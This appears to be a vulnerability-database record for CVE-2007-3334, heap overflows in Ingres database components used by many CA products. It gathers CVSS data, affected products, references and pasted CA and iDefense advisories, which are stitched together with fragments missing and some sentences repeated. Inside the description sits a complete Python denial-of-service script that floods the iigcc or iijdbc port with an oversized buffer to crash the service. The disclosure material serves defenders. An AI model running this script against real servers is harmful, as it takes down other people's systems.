ID

VAR-200706-0395


CVE

CVE-2007-3334


TITLE

eTrust Secure Content Manager including CA Used in products Ingres Database Server For Communications Server Heap-based buffer overflow vulnerability in components

Trust: 0.8

sources: JVNDB: JVNDB-2007-002222

DESCRIPTION

Multiple heap-based buffer overflows in the (1) Communications Server (iigcc.exe) and (2) Data Access Server (iigcd.exe) components for Ingres Database Server 3.0.3, as used in CA (Computer Associates) products including eTrust Secure Content Manager r8 on Windows, allow remote attackers to execute arbitrary code via unknown vectors. Successful exploits will allow attackers to completely compromise affected computers, including executing arbitrary code with SYSTEM-level privileges and truncating the 'alarkp.def' file. 3) Ingres wakeup file overwrite (reported by NGSSoftware) [Ingres bug 115913, CVE-2007-3337, CAID 35451] Description: The "wakeup" binary creates a file named "alarmwkp.def" in the current directory, truncating the file if it already exists. The "wakeup" binary is setuid "ingres" and world-executable. Consequently, an attacker can truncate a file with the privileges of the "ingres" user. 4) Ingres uuid_from_char stack overflow (reported by NGSSoftware) [Ingres bug 115911, CVE-2007-3338, CAID 35452] Description: An attacker can pass a long string as an argument to uuid_from_char() to cause a stack buffer overflow and the saved returned address can be overwritten. 5) Ingres verifydb local stack overflow (reported by NGSSoftware) [Ingres bug 115911, CVE-2007-3338, CAID 35452] Description: A local attacker can exploit a stack overflow in the Ingres verifydb utility duve_get_args function. This only affects Ingres on the Windows operating system. Reported by iDefense as IDEF2023. This only affects Ingres on the Windows operating system. Reported by iDefense as IDEF2022. Mitigating Factors: None Severity: CA has given these vulnerabilities a cumulative High risk rating. Affected Products: Advantage Data Transformer r2.2 AllFusion Enterprise Workbench r1.1, 1.1 SP1, r7, r7.1 AllFusion Harvest Change Manager r7, r7.1 BrightStor ARCserve Backup v9 (Linux only), r11.1, r11.5 (Unix, Linux and Mainframe Linux) BrightStor ARCserve Backup for Laptops and Desktops r11.5 BrightStor Enterprise Backup (Unix only) r10.5 BrightStor Storage Command Center r11.5 BrightStor Storage Resource Manager r11.5 CleverPath Aion Business Rules Expert r10.1 CleverPath Aion Business Process Monitoring r10.1 CleverPath Predictive Analysis Server r3 DocServer 1.1 eTrust Admin v8, v8.1, r8.1 SP1, r8.1 SP2 eTrust Audit r8 SP2 eTrust Directory r8.1 eTrust IAM Suite r8.0 eTrust IAM Toolkit r8.0, r8.1 eTrust Identity Manager r8.1 eTrust Network Forensics r8.1 eTrust Secure Content Manager r8 eTrust Single Sign-On r7, r8, r8.1 eTrust Web Access Control 1.0 Unicenter Advanced Systems Management r11 Unicenter Asset Intelligence r11 Unicenter Asset Management r11 Unicenter Asset Portfolio Management r11.2.1, r11.3 Unicenter CCS r11 Unicenter Database Command Center r11.1 Unicenter Desktop and Server Management r11 Unicenter Desktop Management Suite r11 Unicenter Enterprise Job Manager r1 SP3, r1 SP4 Unicenter Job Management Option r11 Unicenter Lightweight Portal 2 Unicenter Management Portal r3.1.1 Unicenter Network and Systems Management r3.0, r11 Unicenter Network and Systems Management - Tiered - Multi Platform r3.0 0305, r3.1 0403, r11.0 Unicenter Patch Management r11 Unicenter Remote Control 6, r11 Unicenter Service Accounting r11, r11.1 Unicenter Service Assure r2.2, r11, r11.1 Unicenter Service Catalog r11, r11.1 Unicenter Service Delivery r11.0, r11.1 Unicenter Service Intelligence r11 Unicenter Service Metric Analysis r3.0.2, r3.5, r11, r11.1 Unicenter ServicePlus Service Desk 5.5 SP3, 6.0, 6.0 SP1, r11, r11.1, r11.2 Unicenter Software Delivery r11 Unicenter TNG 2.4, 2.4.2, 2.4.2J Unicenter Workload Control Center r1 SP3, r1 SP4 Unicenter Web Services Distributed Management 3.11, 3.50 Wily SOA Manager 7.1 Affected Platforms: All operating system platforms supported by the various CA products that embed Ingres. This includes Windows, Linux, and supported UNIX platforms. Status and Recommendation: CA recommends that customers apply the appropriate fix(es) listed on the Security Notice page: http://supportconnectw.ca.com/premium/ca_common_docs/ingres/ingres_secnotice.asp Workaround: None References (URLs may wrap): CA SupportConnect: http://supportconnect.ca.com/ CA SupportConnect Security Notice for these vulnerabilities: Ingres Security Alert http://supportconnectw.ca.com/public/ca_common_docs/ingresvuln_letter.asp Important Security Notice for Customers Using Products That Embed Ingres http://supportconnectw.ca.com/premium/ca_common_docs/ingres/ingres_secnotice.asp CA Security Advisor posting: CA Products That Embed Ingres Multiple Vulnerabilities http://www.ca.com/us/securityadvisor/newsinfo/collateral.aspx?cid=145778 CA Vuln ID (CAID): 35450, 35451, 35452, 35453 http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35450 http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35451 http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35452 http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35453 Ingres knowledge base document: http://servicedesk.ingres.com/CAisd/pdmweb.ingres?OP=SHOW_DETAIL+PERSID=KD:415738+HTMPL=kt_document_view.htmpl Reported By: NGSSoftware, and iDefense NGSSoftware Advisory: http://www.ngssoftware.com/research/advisories/ iDefense Advisory: Ingres Database Multiple Heap Corruption Vulnerabilities http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=546 CVE References: CVE-2007-3336, CVE-2007-3337, CVE-2007-3338, CVE-2007-3334 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3336 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3337 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3338 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3334 OSVDB References: Pending http://osvdb.org/ Changelog for this advisory: v1.0 - Initial Release Customers who require additional information should contact CA Technical Support at http://supportconnect.ca.com. For technical questions or comments related to this advisory, please send email to vuln AT ca DOT com. If you discover a vulnerability in CA products, please report your findings to vuln AT ca DOT com, or utilize our "Submit a Vulnerability" form. URL: http://www.ca.com/us/securityadvisor/vulninfo/submit.aspx Regards, Ken Williams ; 0xE2941985 Director, CA Vulnerability Research CA, 1 CA Plaza, Islandia, NY 11749 Contact http://www.ca.com/us/contact/ Legal Notice http://www.ca.com/us/legal/ Privacy Policy http://www.ca.com/us/privacy/ Copyright (c) 2007 CA. All rights reserved. Ingres Database Multiple Heap Corruption Vulnerabilities iDefense Security Advisory 06.21.07 http://labs.idefense.com/intelligence/vulnerabilities/ Jun 21, 2007 I. BACKGROUND Ingres is the database backend used by default in several CA products. The SCM (Secure Content Manager) is one of the products that uses Ingres. The SCM use Ingres to store quarantined virii and blocked HTTP requests/replies. For more information visit the following URLs. http://www3.ca.com/solutions/Product.aspx?ID=1013 http://www.ingres.com/ II. The Communications Server is the main component responsible for receiving and handling requests from the network. The Data Access Server is responsible for handling requests from the Ingres JDBC Driver and .NET data providers. These requests are decoded into Ingres internal formats and passed on to other components of the database server. The application does not properly validate the length of attacker supplied data before copying it into a fixed size heap buffer. This leads to an exploitable condition. III. ANALYSIS Exploitation allows an unauthenticated attacker to execute arbitrary code with SYSTEM privileges. In order to exploit this vulnerability an attacker would have to send a malformed request to the database server. This requires the ability to establish a TCP session on port 10916 (iigcc) or 10923 (iigcd). Exploitation has been demonstrated to be trivial. IV. Previous versions may also be affected. In addition, any application that uses the Ingres Database may be vulnerable. V. WORKAROUND Employing firewalls or other access control methods can effectively reduce exposure to this vulnerability. VI. VENDOR RESPONSE CA has made fixes available for all supported CA products that embed Ingres. For more information consult CA's Security Alert at the following URL. http://supportconnectw.ca.com/public/ca_common_docs/ingresvuln_letter.asp VII. CVE INFORMATION The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2007-3334 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org/), which standardizes names for security problems. VIII. DISCLOSURE TIMELINE 01/16/2007 Initial vendor notification 01/17/2007 Initial vendor response 06/21/2007 Coordinated public disclosure IX. CREDIT The discoverer of this vulnerability wishes to remain anonymous. Get paid for vulnerability research http://labs.idefense.com/methodology/vulnerability/vcp.php Free tools, research and upcoming events http://labs.idefense.com/ X. LEGAL NOTICES Copyright \xa9 2007 iDefense, Inc. Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please e-mail customerservice@idefense.com for permission. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information. # Exploit Title: Computer Associates Advantage Ingres 2.6 Denial of Service Vulnerabilities # Date: 2010-08-14 # Author: fdisk # Version: 2.6 # Tested on: Windows 2003 Server SP1 en # CVE: CVE-2007-3334 - CVE-2007-3336 - CVE-2007-3337 - CVE-2007-3338 # Notes: Fixed in the last version. # please let me know if you are/were able to get code execution <rr dot fdisk at gmail dot com> import socket import sys if len(sys.argv) != 4: print "Usage: ./CAAdvantageDoS.py <Target IP> <Port> <Service>" print "Vulnerable Services: iigcc, iijdbc" sys.exit(1) host = sys.argv[1] port = int(sys.argv[2]) service = sys.argv[3] if service == "iigcc": payload = "\x41" * 2106 elif service == "iijdbc": payload = "\x41" * 1066 else: print "Vulnerable Services: iigcc, iijdbc" sys.exit(1) payload += "\x42" * 4 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((host, port)) print "Sending payload" s.send(payload) data = s.recv(1024) s.close() print 'Received', repr(data) print service + " crashed"

Trust: 2.16

sources: NVD: CVE-2007-3334 // JVNDB: JVNDB-2007-002222 // BID: 24585 // PACKETSTORM: 57303 // PACKETSTORM: 57276 // PACKETSTORM: 92818

AFFECTED PRODUCTS

vendor:ingresmodel:database serverscope:eqversion:3.0.3

Trust: 1.8

vendor:camodel:etrust secure content managerscope:eqversion:8.0

Trust: 1.0

vendor:camodel:etrust secure content managerscope:eqversion:r8

Trust: 0.8

vendor:microsoftmodel:windowsscope: - version: -

Trust: 0.8

vendor:microsoftmodel:all windowsscope: - version: -

Trust: 0.6

vendor:ingresmodel:databasescope:eqversion:20060

Trust: 0.3

vendor:ingresmodel:databasescope:eqversion:3.0.3

Trust: 0.3

vendor:ingresmodel:databasescope:eqversion:2.6

Trust: 0.3

vendor:ingresmodel:databasescope:eqversion:2.5

Trust: 0.3

vendor:computermodel:associates wily soa managerscope:eqversion:7.1

Trust: 0.3

vendor:computermodel:associates unicenter workload control center 1.0.sp4scope: - version: -

Trust: 0.3

vendor:computermodel:associates unicenter workload control center sp4scope:eqversion:1.0

Trust: 0.3

vendor:computermodel:associates unicenter tngscope:eqversion:2.4.2

Trust: 0.3

vendor:computermodel:associates unicenter tngscope:eqversion:2.2

Trust: 0.3

vendor:computermodel:associates unicenter tng 2.4.2jscope: - version: -

Trust: 0.3

vendor:computermodel:associates unicenter software deliveryscope:eqversion:11

Trust: 0.3

vendor:computermodel:associates unicenter serviceplus service deskscope:eqversion:6.0

Trust: 0.3

vendor:computermodel:associates unicenter serviceplus service desk sp1scope:eqversion:6.0

Trust: 0.3

vendor:computermodel:associates unicenter serviceplus service desk sp3scope:eqversion:5.5

Trust: 0.3

vendor:computermodel:associates unicenter serviceplus service deskscope:eqversion:11.2

Trust: 0.3

vendor:computermodel:associates unicenter serviceplus service deskscope:eqversion:11.1

Trust: 0.3

vendor:computermodel:associates unicenter serviceplus service deskscope:eqversion:11

Trust: 0.3

vendor:computermodel:associates unicenter service metric analysisscope:eqversion:3.5

Trust: 0.3

vendor:computermodel:associates unicenter service metric analysisscope:eqversion:3.0.2

Trust: 0.3

vendor:computermodel:associates unicenter service metric analysisscope:eqversion:11.1

Trust: 0.3

vendor:computermodel:associates unicenter service metric analysisscope:eqversion:11

Trust: 0.3

vendor:computermodel:associates unicenter service intelligencescope:eqversion:11

Trust: 0.3

vendor:computermodel:associates unicenter service deliveryscope:eqversion:11.0

Trust: 0.3

vendor:computermodel:associates unicenter service deliveryscope:eqversion:11.1

Trust: 0.3

vendor:computermodel:associates unicenter service catalogscope:eqversion:11

Trust: 0.3

vendor:computermodel:associates unicenter service assurescope:eqversion:2.2

Trust: 0.3

vendor:computermodel:associates unicenter service assurescope:eqversion:11.1

Trust: 0.3

vendor:computermodel:associates unicenter service assurescope:eqversion:11

Trust: 0.3

vendor:computermodel:associates unicenter remote controlscope:eqversion:6.0

Trust: 0.3

vendor:computermodel:associates unicenter remote controlscope:eqversion:11

Trust: 0.3

vendor:computermodel:associates unicenter patch managementscope:eqversion:11

Trust: 0.3

vendor:computermodel:associates unicenter network and systems managementscope:eqversion:3.1

Trust: 0.3

vendor:computermodel:associates unicenter network and systems managementscope:eqversion:3.0

Trust: 0.3

vendor:computermodel:associates unicenter network and systems managementscope:eqversion:11

Trust: 0.3

vendor:computermodel:associates unicenter management portalscope:eqversion:3.1.1

Trust: 0.3

vendor:computermodel:associates unicenter lightweight portalscope:eqversion:2

Trust: 0.3

vendor:computermodel:associates unicenter job management optionscope:eqversion:11.0

Trust: 0.3

vendor:computermodel:associates unicenter enterprise job manager sp4scope:eqversion:1.0

Trust: 0.3

vendor:computermodel:associates unicenter enterprise job manager sp3scope:eqversion:1.0

Trust: 0.3

vendor:computermodel:associates unicenter desktop management suitescope:eqversion:11

Trust: 0.3

vendor:computermodel:associates unicenter desktop and server managementscope:eqversion:11

Trust: 0.3

vendor:computermodel:associates unicenter database command centerscope:eqversion:11.1

Trust: 0.3

vendor:computermodel:associates unicenter ca web services distributed managementscope:eqversion:3.5

Trust: 0.3

vendor:computermodel:associates unicenter ca web services distributed managementscope:eqversion:3.11

Trust: 0.3

vendor:computermodel:associates unicenter asset portfolio managementscope:eqversion:11.2.1

Trust: 0.3

vendor:computermodel:associates unicenter asset portfolio managementscope:eqversion:11.0

Trust: 0.3

vendor:computermodel:associates unicenter asset portfolio managementscope:eqversion:11.3

Trust: 0.3

vendor:computermodel:associates unicenter asset managementscope:eqversion:11

Trust: 0.3

vendor:computermodel:associates unicenter asset intelligencescope:eqversion:11

Trust: 0.3

vendor:computermodel:associates unicenter advanced systems managementscope:eqversion:11

Trust: 0.3

vendor:computermodel:associates etrust web access controlscope:eqversion:1.0

Trust: 0.3

vendor:computermodel:associates etrust single sign-onscope:eqversion:8.1

Trust: 0.3

vendor:computermodel:associates etrust single sign-onscope:eqversion:8

Trust: 0.3

vendor:computermodel:associates etrust single sign-onscope:eqversion:7

Trust: 0.3

vendor:computermodel:associates etrust secure content managerscope:eqversion:8.0

Trust: 0.3

vendor:computermodel:associates etrust network forensicsscope:eqversion:8.1

Trust: 0.3

vendor:computermodel:associates etrust identity managerscope:eqversion:8.1

Trust: 0.3

vendor:computermodel:associates etrust iam toolkitscope:eqversion:8.1

Trust: 0.3

vendor:computermodel:associates etrust iam toolkitscope:eqversion:8

Trust: 0.3

vendor:computermodel:associates etrust iam suitescope:eqversion:8

Trust: 0.3

vendor:computermodel:associates etrust directoryscope:eqversion:8.1

Trust: 0.3

vendor:computermodel:associates etrust audit r8scope: - version: -

Trust: 0.3

vendor:computermodel:associates etrust adminscope:eqversion:8.1

Trust: 0.3

vendor:computermodel:associates etrust adminscope:eqversion:8.0

Trust: 0.3

vendor:computermodel:associates etrust admin sp2scope:eqversion:8.1

Trust: 0.3

vendor:computermodel:associates etrust admin sp1scope:eqversion:8.1

Trust: 0.3

vendor:computermodel:associates docserverscope:eqversion:1.1

Trust: 0.3

vendor:computermodel:associates cleverpath predictive analysis serverscope:eqversion:3.0

Trust: 0.3

vendor:computermodel:associates cleverpath aion brescope:eqversion:10.1

Trust: 0.3

vendor:computermodel:associates cleverpath aion bpmscope:eqversion:10.1

Trust: 0.3

vendor:computermodel:associates ccsscope:eqversion:11

Trust: 0.3

vendor:computermodel:associates brightstor storage resource managerscope:eqversion:11.5

Trust: 0.3

vendor:computermodel:associates brightstor storage command centerscope:eqversion:11.5

Trust: 0.3

vendor:computermodel:associates brightstor enterprise backup for tru64scope:eqversion:10.5

Trust: 0.3

vendor:computermodel:associates brightstor enterprise backup for solarisscope:eqversion:10.5

Trust: 0.3

vendor:computermodel:associates brightstor enterprise backup for hpscope:eqversion:10.5

Trust: 0.3

vendor:computermodel:associates brightstor enterprise backup for aixscope:eqversion:10.5

Trust: 0.3

vendor:computermodel:associates brightstor arcserve backup for linuxscope:eqversion:11.1

Trust: 0.3

vendor:computermodel:associates brightstor arcserve backup for linuxscope:eqversion:9.0

Trust: 0.3

vendor:computermodel:associates brightstor arcserve backupscope:eqversion:11.1

Trust: 0.3

vendor:computermodel:associates brightstor arcserve backupscope:eqversion:11.5

Trust: 0.3

vendor:computermodel:associates arcserve backup for laptops and desktopsscope:eqversion:11.5

Trust: 0.3

vendor:computermodel:associates allfusion harvest change managerscope:eqversion:7.1

Trust: 0.3

vendor:computermodel:associates allfusion harvest change managerscope:eqversion:7

Trust: 0.3

vendor:computermodel:associates allfusion enterprise workbenchscope:eqversion:7.1

Trust: 0.3

vendor:computermodel:associates allfusion enterprise workbenchscope:eqversion:7

Trust: 0.3

vendor:computermodel:associates allfusion enterprise workbench sp1scope:eqversion:1.1

Trust: 0.3

vendor:computermodel:associates allfusion enterprise workbenchscope:eqversion:1.1

Trust: 0.3

vendor:computermodel:associates advantage data transformerscope:eqversion:2.2

Trust: 0.3

sources: BID: 24585 // JVNDB: JVNDB-2007-002222 // NVD: CVE-2007-3334 // CNNVD: CNNVD-200706-357

CVSS

SEVERITY

CVSSV2

CVSSV3

NVD: CVE-2007-3334
value: HIGH

Trust: 1.8

CNNVD: CNNVD-200706-357
value: CRITICAL

Trust: 0.6

NVD:
severity: HIGH
baseScore: 10.0
vectorString: AV:N/AC:L/AU:N/C:C/I:C/A:C
accessVector: NETWORK
accessComplexity: LOW
authentication: NONE
confidentialityImpact: COMPLETE
integrityImpact: COMPLETE
availabilityImpact: COMPLETE
exploitabilityScore: 10.0
impactScore: 10.0
acInsufInfo: FALSE
obtainAllPrivilege: TRUE
obtainUserPrivilege: FALSE
obtainOtherPrivilege: FALSE
userInteractionRequired: FALSE
version: 2.0

Trust: 1.0

NVD: CVE-2007-3334
severity: HIGH
baseScore: 10.0
vectorString: AV:N/AC:L/AU:N/C:C/I:C/A:C
accessVector: NETWORK
accessComplexity: LOW
authentication: NONE
confidentialityImpact: COMPLETE
integrityImpact: COMPLETE
availabilityImpact: COMPLETE
exploitabilityScore: NONE
impactScore: NONE
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 0.8

sources: JVNDB: JVNDB-2007-002222 // NVD: CVE-2007-3334 // CNNVD: CNNVD-200706-357

PROBLEMTYPE DATA

problemtype:NVD-CWE-Other

Trust: 1.0

sources: NVD: CVE-2007-3334

THREAT TYPE

remote

Trust: 0.7

sources: PACKETSTORM: 57276 // CNNVD: CNNVD-200706-357

TYPE

buffer overflow

Trust: 0.6

sources: CNNVD: CNNVD-200706-357

CONFIGURATIONS

sources: NVD: CVE-2007-3334

PATCH

title:Top Pageurl:http://supportconnectw.ca.com/public/ca_common_docs/ingresvuln_letter.asp

Trust: 0.8

title:Top Pageurl:http://www.actian.com/products/ingres

Trust: 0.8

title:Top Pageurl:http://windows.microsoft.com/en-us/windows/home

Trust: 0.8

sources: JVNDB: JVNDB-2007-002222

EXTERNAL IDS

db:NVDid:CVE-2007-3334

Trust: 3.0

db:BIDid:24585

Trust: 1.9

db:VUPENid:ADV-2007-2288

Trust: 1.6

db:VUPENid:ADV-2007-2290

Trust: 1.6

db:SECUNIAid:25756

Trust: 1.6

db:SECUNIAid:25775

Trust: 1.6

db:SECTRACKid:1018278

Trust: 1.6

db:OSVDBid:37488

Trust: 1.0

db:OSVDBid:37487

Trust: 1.0

db:JVNDBid:JVNDB-2007-002222

Trust: 0.8

db:XFid:35002

Trust: 0.6

db:XFid:34992

Trust: 0.6

db:XFid:34991

Trust: 0.6

db:IDEFENSEid:20070621 INGRES DATABASE MULTIPLE HEAP CORRUPTION VULNERABILITIES

Trust: 0.6

db:CNNVDid:CNNVD-200706-357

Trust: 0.6

db:PACKETSTORMid:57303

Trust: 0.1

db:PACKETSTORMid:57276

Trust: 0.1

db:PACKETSTORMid:92818

Trust: 0.1

sources: BID: 24585 // JVNDB: JVNDB-2007-002222 // PACKETSTORM: 57303 // PACKETSTORM: 57276 // PACKETSTORM: 92818 // NVD: CVE-2007-3334 // CNNVD: CNNVD-200706-357

REFERENCES

url:http://supportconnectw.ca.com/public/ca_common_docs/ingresvuln_letter.asp

Trust: 2.1

url:http://www.ca.com/us/securityadvisor/newsinfo/collateral.aspx?cid=145778

Trust: 2.0

url:http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=546

Trust: 2.0

url:http://secunia.com/advisories/25756

Trust: 1.6

url:http://secunia.com/advisories/25775

Trust: 1.6

url:http://www.securityfocus.com/bid/24585

Trust: 1.6

url:http://www.securitytracker.com/id?1018278

Trust: 1.6

url:http://osvdb.org/37487

Trust: 1.0

url:http://osvdb.org/37488

Trust: 1.0

url:http://www.vupen.com/english/advisories/2007/2288

Trust: 1.0

url:http://www.vupen.com/english/advisories/2007/2290

Trust: 1.0

url:https://exchange.xforce.ibmcloud.com/vulnerabilities/34991

Trust: 1.0

url:https://exchange.xforce.ibmcloud.com/vulnerabilities/34992

Trust: 1.0

url:https://exchange.xforce.ibmcloud.com/vulnerabilities/35002

Trust: 1.0

url:http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2007-3334

Trust: 0.9

url:http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2007-3334

Trust: 0.8

url:http://xforce.iss.net/xforce/xfdb/35002

Trust: 0.6

url:http://xforce.iss.net/xforce/xfdb/34992

Trust: 0.6

url:http://xforce.iss.net/xforce/xfdb/34991

Trust: 0.6

url:http://www.frsirt.com/english/advisories/2007/2290

Trust: 0.6

url:http://www.frsirt.com/english/advisories/2007/2288

Trust: 0.6

url:http://www.ingres.com/

Trust: 0.4

url:/archive/1/472192

Trust: 0.3

url:/archive/1/471950

Trust: 0.3

url:/archive/1/472197

Trust: 0.3

url:/archive/1/472193

Trust: 0.3

url:/archive/1/472194

Trust: 0.3

url:/archive/1/472200

Trust: 0.3

url:msg://bugtraq/649cdcb56c88aa458eff2cbf494b6204030a79ca@usilms12.ca.com

Trust: 0.3

url:http://www.ngssoftware.com/advisories/critical-risk-vulnerability-in-ingres-pointer-overwrite-2/

Trust: 0.3

url:https://nvd.nist.gov/vuln/detail/cve-2007-3334

Trust: 0.3

url:https://nvd.nist.gov/vuln/detail/cve-2007-3336

Trust: 0.2

url:https://nvd.nist.gov/vuln/detail/cve-2007-3337

Trust: 0.2

url:https://nvd.nist.gov/vuln/detail/cve-2007-3338

Trust: 0.2

url:http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2007-3336

Trust: 0.1

url:http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2007-3338

Trust: 0.1

url:http://supportconnect.ca.com/

Trust: 0.1

url:http://www.ca.com/us/contact/

Trust: 0.1

url:http://www.ca.com/us/securityadvisor/vulninfo/submit.aspx

Trust: 0.1

url:http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2007-3337

Trust: 0.1

url:http://servicedesk.ingres.com/caisd/pdmweb.ingres?op=show_detail+persid=kd:415738+htmpl=kt_document_view.htmpl

Trust: 0.1

url:http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35452

Trust: 0.1

url:http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35451

Trust: 0.1

url:http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35453

Trust: 0.1

url:http://www.ca.com/us/privacy/

Trust: 0.1

url:http://supportconnect.ca.com.

Trust: 0.1

url:http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35450

Trust: 0.1

url:http://supportconnectw.ca.com/premium/ca_common_docs/ingres/ingres_secnotice.asp

Trust: 0.1

url:http://osvdb.org/

Trust: 0.1

url:http://www.ngssoftware.com/research/advisories/

Trust: 0.1

url:http://www.ca.com/us/legal/

Trust: 0.1

url:http://www3.ca.com/solutions/product.aspx?id=1013

Trust: 0.1

url:http://cve.mitre.org/),

Trust: 0.1

url:http://labs.idefense.com/intelligence/vulnerabilities/

Trust: 0.1

url:http://labs.idefense.com/methodology/vulnerability/vcp.php

Trust: 0.1

url:http://labs.idefense.com/

Trust: 0.1

sources: BID: 24585 // JVNDB: JVNDB-2007-002222 // PACKETSTORM: 57303 // PACKETSTORM: 57276 // PACKETSTORM: 92818 // NVD: CVE-2007-3334 // CNNVD: CNNVD-200706-357

CREDITS

iDEFENSEChris Anley※ chris@ngssoftware.com

Trust: 0.6

sources: CNNVD: CNNVD-200706-357

SOURCES

db:BIDid:24585
db:JVNDBid:JVNDB-2007-002222
db:PACKETSTORMid:57303
db:PACKETSTORMid:57276
db:PACKETSTORMid:92818
db:NVDid:CVE-2007-3334
db:CNNVDid:CNNVD-200706-357

LAST UPDATE DATE

2023-12-18T12:46:47.324000+00:00


SOURCES UPDATE DATE

db:BIDid:24585date:2015-03-19T08:36:00
db:JVNDBid:JVNDB-2007-002222date:2012-06-26T00:00:00
db:NVDid:CVE-2007-3334date:2017-07-29T01:32:10.940
db:CNNVDid:CNNVD-200706-357date:2007-06-25T00:00:00

SOURCES RELEASE DATE

db:BIDid:24585date:2007-06-21T00:00:00
db:JVNDBid:JVNDB-2007-002222date:2012-06-26T00:00:00
db:PACKETSTORMid:57303date:2007-06-26T21:32:27
db:PACKETSTORMid:57276date:2007-06-26T20:06:58
db:PACKETSTORMid:92818date:2010-08-17T01:35:50
db:NVDid:CVE-2007-3334date:2007-06-21T22:30:00
db:CNNVDid:CNNVD-200706-357date:2007-06-21T00:00:00